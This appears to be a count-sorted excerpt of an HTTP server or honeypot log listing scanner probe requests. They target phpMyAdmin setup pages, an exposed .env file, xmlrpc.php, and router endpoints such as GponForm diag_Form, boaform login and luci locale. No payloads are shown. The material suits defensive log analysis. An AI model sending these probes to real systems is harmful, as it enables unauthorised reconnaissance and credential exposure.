1 GET http[:]//13[.]67[.]44[.]234:80/phpmy-admin/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpmyadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/pma/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/sqlmanager/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/sqlweb/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/webadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/webdb/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/websql/scripts/setup.php HTTP/1.0
1 HEAD /.env HTTP/1.1
1 OPTIONS / HTTP/1.0
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
4 POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1
2 POST /cgi/networkDiag.cgi HTTP/1.1
1 POST /xmlrpc.php HTTP/1.1
2 PRI * HTTP/2.0